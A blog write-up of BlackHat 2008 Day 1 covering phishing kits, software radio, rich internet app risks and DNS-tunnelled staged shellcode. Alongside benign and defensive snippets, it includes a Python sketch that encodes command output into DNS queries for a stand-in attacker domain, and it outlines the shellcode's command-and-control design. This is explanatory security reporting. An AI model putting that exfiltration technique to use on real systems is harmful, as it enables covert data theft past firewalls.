BlackHat 2008, Day 1

Today was the first day of this year’s BlackHat Briefings in Las Vegas. The biggest security conference of the year, it’s always an interesting place to be and often involves the release of new and previously unknown exploits.

The keynote speaker was Ian Angell, of the London School of Economics, who was speaking, ostensibly, about risk. He is described as having “very radical and constructive” views on the subject. His primary point was that when you put together a bunch of parts into a system, it often goes off the rails — every action leads not just to a reaction, but to a loop wherein the unintended consequences feed back into themselves. This makes control very difficult (he brought up Goodhart’s Law: “any observed statistical regularity will tend to collapse when pressure is placed on it for control purposes.”) The IT industry is obsessed with providing more information, but omnipresent computer screens distract and cause errors in judgment — people come to rely entirely on the system, suspending independent thought and blindly following the machine, while simultaneously missing details in the information overload.

Humans are obsessed with categorization — the attempt to treat the similar as identical. We deal with complexity by dropping less-significant relationships from our mental models — but those relationships still exist, and this creates uncertainty and risk. Computer systems aren’t alone in this: bureaucracy is the most effective way to deal with normal situations, but as anyone who has dealt with one knows, it is terrible at handling anything out of the ordinary.

However, for all this, I found Professor Angell basically useless. He comes across as very smart and amusing, but he points out problems without the slightest inkling of a solution. Yes, systems create complexity, from which comes risk. Shall we then abandon IT security in favor of a hunter-gatherer society? I don’t think I could get an answer on that from him.

The next presentation was by Billy Rios and Nitesh Dhanjani on the phishing culture and community. They observed some phishing code and noticed common strings, and thought to do a Google search on them with the intent of finding other places that phishing code was in use. Instead, they found thousands of credit card numbers, SSNs, and other identity information all over the Internet, in public forums, searchable on Google. The phishers throw around identities constantly, just to prove their authenticity. Meanwhile, they phish each other constantly — most of the phishing kits they found had back-doors in them or secret code to email a copy of all captured identities to their author. They’re not hackers at all; they generally know just enough to upload a kit someone else wrote to a site someone else hacked and collect the information. Also, ironically, the Google anti-malware blacklist turns out to be a fantastic way to find already-hacked sites to put phishing kits on — it’s full of administrative logins and passwords.

This was followed by Dan Kaminsky’s DNS update, which I’m going to discuss in a separate post; despite all the hype, I think it lived up to it. Faulty DNS is a Really Bad Thing.

Michael Ossmann had a presentation to give on software radio and the future of wireless security. Unfortunately, it was long on software radio and short on security. He mostly spoke about the USRP, a piece of open-source hardware (also available pre-built for $700) that gives full software radio capabilities to a PC. It can capture a significant amount of bandwidth in a range up into the 2.4 GHz band. Ossmann’s demonstration of this involved doing packet-capture on Project 25 radios, and a replay attack on a remote-control toy. Essentially, command-line tools can capture radio on most frequencies, and then (as it’s just a bitstream) DSP techniques can manipulate it arbitrarily.
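The bitstream point is the crux: once the radio signal is just samples in memory, demodulation is ordinary code. As a minimal sketch (with an invented capture and bit rate, not Ossmann's actual tooling), here is how thresholding an on-off-keyed signal down to bits might look:

```python
# Hypothetical sketch: demodulating a captured on-off-keyed (OOK) bitstream,
# the kind of DSP step a USRP capture-and-replay workflow involves.
# The sample data and bit rate below are invented for illustration.

def demodulate_ook(samples, samples_per_bit, threshold=0.5):
    """Average the amplitude over each symbol period, then threshold to a bit."""
    bits = []
    for i in range(0, len(samples) - samples_per_bit + 1, samples_per_bit):
        window = samples[i:i + samples_per_bit]
        avg = sum(abs(s) for s in window) / samples_per_bit
        bits.append(1 if avg > threshold else 0)
    return bits

# A fake capture: 4 samples per bit, encoding the bits 1, 0, 1, 1
capture = [0.9, 1.0, 0.8, 0.9,   # 1
           0.1, 0.0, 0.2, 0.1,   # 0
           0.9, 0.8, 1.0, 0.9,   # 1
           1.0, 0.9, 0.9, 0.8]   # 1
print(demodulate_ook(capture, samples_per_bit=4))  # [1, 0, 1, 1]
```

Replaying is the same thing in reverse: map the recovered bits back to samples and hand them to the transmitter, no knowledge of the protocol required.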

While his speech had very little about security in it, the implications are significant in the long term. Making a good radio means either using very expensive analog components, or using cheap analog components and a lot of CPU power. In a few years, “a lot of CPU power” will be available on your phone, just given the rate at which CPUs improve. Wireless (802.11) security didn’t become a big issue as soon as it was possible to crack WEP (i.e. almost instantly) — it became a big issue when wireless cards with raw packet injection and monitor mode became cheap and ubiquitous. Wireless hacking takes a $700 USRP now; it’ll take a cell phone in 5 years (as CPUs get more powerful, software radio gets cheaper than hardware radio, so it’s only a matter of time until the radios in phones and such are pure software, and thus reprogrammable.) You can see the beginning of this in THC’s GSM Project. If the cell phone network finds itself, security-wise, as badly off as 802.11 is today, it could be a frightening thing.

Alex Stamos and company from iSec Partners had a presentation on Rich Internet Application frameworks.  Rich Internet Applications aren’t well-defined, but they contain one or more of the following: AJAX UIs, local storage, an offline mode, running outside the browser, access to hardware resources, or the general appearance of a thick-client app.  Adobe, Microsoft, and others have created various apps and tools to help developers create these rich web apps.

Adobe AIR is the most full-featured of them — an AIR application runs in a full desktop runtime based on Flash.  There’s no sandboxing — a locally-installed AIR app has the full powers of the user, like an ActiveX control.  You can develop them in Flash, Flex, or JavaScript.  However, AIR apps can be launched from the web by ordinary Flash files (assuming the app is already installed on your computer.)  There is a remote mode, for running directly off the web with reduced privileges, but there’s a method for communicating and even passing objects between the local (full-trust) and remote modes.  Overall, it’s a scary thing, in the way that EXEs are scary (i.e. it’s insecure, but not any more insecure than everything else.)

Microsoft’s Silverlight is rather more restricted; it’s closer to Flash than to AIR.  Silverlight apps can be written in XAML with any .NET language, and use a scaled-down .NET runtime.  There is socket support, like Flash, but it is limited to certain ports (4502-4534) and requires a policy file (clientaccesspolicy.xml) on the target server, even if the target server is the same site the app came from.
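For reference, a minimal clientaccesspolicy.xml granting TCP socket access on that port range to any caller might look like the sketch below; the element names follow the Silverlight cross-domain policy schema, but treat the specifics as an assumption to verify against Microsoft's documentation:

```xml
<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from>
        <domain uri="*" />
      </allow-from>
      <grant-to>
        <socket-resource port="4502-4534" protocol="tcp" />
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
```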

Google Gears is even less functional than Flash and Silverlight; it’s essentially running HTML and JavaScript from the local machine.  There is local storage, and data sync with an API and SQLite for relational-database-like storage.  Also, it has the ability to run processes in a threadpool outside the browser, so as not to get shut down by the browsers’ tight-loop detection.  Bizarrely, it allows the app author to customize the installation warning dialog, making it quite easy to convince people to install weird Gears apps.  It would be good for distributed malware, like cryptanalysis.

Yahoo! BrowserPlus is designed to make it easy to write browser plugins, which is kind of like making it easy to make bombs.  There are some things that shouldn’t be easy, because the fewer of them, the better, and browser plugins (almost all of which seem to be adware/spyware) are one of them.  BrowserPlus add-ons are initialized by an HTTP call to Yahoo!, and run with full trust.  It’s like ActiveX with a built-in Ruby interpreter (an old, buggy one, even.)

Finally, Mozilla Prism is a site-specific browser with the browser UI stripped off.  Formerly known as WebRunner, it’s used to “desktopize” web apps.  The risk here is comparatively low, though the script has XPCOM privileges (basically, control over the browser itself, like a Firefox extension would have.)

You can also just use HTML5 for some rich functionality, like local storage.  There is DOM storage, allowing you to persist up to 5MB of data locally, as well as SQLite-based database functionality.  DOM storage is essentially the ability to save immense cookies, and the SQLite databases are subject to SQL injection attacks.  The W3C has had better ideas.  Also, unlike cookies, you can’t easily turn DOM storage off (there’s a Firefox about:config setting, but nowhere in the UI.)  As mobile devices bundle WebKit browsers (like Safari), they’ll be subject to this type of storage — it would be pretty easy to DoS a mobile device by writing dozens of 5MB cookies.

So, what does all this lead to?  A host of new security issues we never had to think about before, of course!   The RIA data stores are vulnerable to XSS — if your email or other personal data is in an AIR or Gears app, and someone gets an XSS on the sites the apps come from, they can steal your entire data store.  You can have SQL injection against JavaScript now, thanks to SQLite databases.  The same Flash-based XSS attacks we’ve seen now work on Silverlight and AIR as well.

On the bright side, they had some good prescriptive guidance for app developers:

  1. Don’t use predictably-named data stores
  2. Parameterize SQL, even on local SQLite stores
  3. Domain-lock sites if possible
  4. Don’t use AIR when Flash/Flex/Silverlight/etc. will do fine
  5. Let users opt out of RIA functionality
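Guidance item 2 is easy to demonstrate. Here is a minimal sketch in Python against a local SQLite store (the table and input are invented for illustration), showing why string-built SQL fails where a parameterized query holds:

```python
import sqlite3

# A stand-in for an RIA's local SQLite data store (names are hypothetical).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE notes (owner TEXT, body TEXT)")
conn.execute("INSERT INTO notes VALUES ('alice', 'secret')")

# Attacker-controlled input, e.g. arriving via an XSS on the app's origin.
user_input = "x' OR '1'='1"

# Vulnerable: string concatenation lets the quote escape the SQL literal.
unsafe = "SELECT body FROM notes WHERE owner = '%s'" % user_input
print(len(conn.execute(unsafe).fetchall()))  # 1 -- injection returned the row

# Safe: the driver binds the value, so the quote is treated as plain data.
safe = conn.execute("SELECT body FROM notes WHERE owner = ?", (user_input,))
print(len(safe.fetchall()))  # 0 -- no owner literally named "x' OR '1'='1"
```

"It's only local data" is no excuse: once the store holds your email or credentials, the local database is exactly what the attacker is after.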

Finally, Ty Miller had some shellcode to show us — reverse DNS tunnelling staged-loading shellcode, in fact.  The trend in vulnerabilities has been toward client-side exploits of late, now that socket-based servers have been hardened significantly.  However, if you do buffer-overflow a client app and get it to execute shellcode, the challenge is often getting a connection back to the attacker.  Clients are often behind firewalls, proxies, NATs, or all three.

Of the common shellcode techniques (port binding, callback, find-socket, address reuse, download & execute, and HTTP tunneling), only one (HTTP tunneling) works reliably with client apps — and Metasploit’s HTTP tunneling shellcode only works on IE6 with ActiveX enabled.  DNS tunneling (like Kaminsky’s OzymanDNS from 2004) would also get a connection back — and even more reliably than HTTP, since it wouldn’t need to worry about authenticated proxies.

DNS gets through everything.  When you make a DNS request, it goes to your company or ISP’s DNS server, which forwards it on to a top-level server (like .com) and then to the DNS server that owns the domain name.  Practically everything makes DNS lookups (as Dan Kaminsky went into today), and nothing works if they’re blocked, so any computer is all but guaranteed to have DNS access.  With a malicious DNS server, you can actually tunnel arbitrary data through DNS.

Miller’s shellcode consisted of a tiny first stage which finds kernel32, creates pipes for STDIN and STDOUT, then makes an nslookup (yes, it shells out to nslookup) for a TXT record on the malicious DNS server.  The TXT record type can be extremely long, and the record it gets back contains the second-stage shellcode and a command to run.  The second stage shellcode runs the command, captures the output, and sends it back in fragmented DNS requests.  It then polls periodically for more commands to run.  The DNS requests all have a sequence number in them, guaranteeing that they don’t get cached and always get through.
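The encoding side of that scheme can be sketched in a few lines. This illustrates the general technique, not Miller's actual code; the domain name and record layout are assumptions:

```python
import binascii

# Hypothetical sketch of DNS-tunnelled exfiltration: hex-encode command
# output, chop it into DNS-legal labels (63 bytes max each), and prefix a
# sequence number so every query name is unique and can't be served from
# a resolver's cache. The domain below is invented for illustration.

MAX_LABEL = 63

def to_dns_queries(data: bytes, domain: str = "evil.example.com"):
    hexed = binascii.hexlify(data).decode()
    labels = [hexed[i:i + MAX_LABEL] for i in range(0, len(hexed), MAX_LABEL)]
    # One lookup per fragment: <seq>.<payload>.<domain>
    return ["%d.%s.%s" % (seq, label, domain)
            for seq, label in enumerate(labels)]

queries = to_dns_queries(b"uid=0(root)")
print(queries[0])  # 0.7569643d3028726f6f7429.evil.example.com
```

Each of those names resolves through the victim's ordinary recursive resolver, which dutifully delivers the payload to the attacker's authoritative server; the responses carry the next commands back in.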

He’s making his code available at projectshellcode.com, a site where he hopes to focus shellcode research and start a collection.  I think this is of dubious value (unlike exploits, shellcode is not really very useful to security folks on the “good guys'” side most of the time), but it’ll be interesting to take a look at what he’s come up with.

attacks, hardware, industry, mitigations, SOA/XML
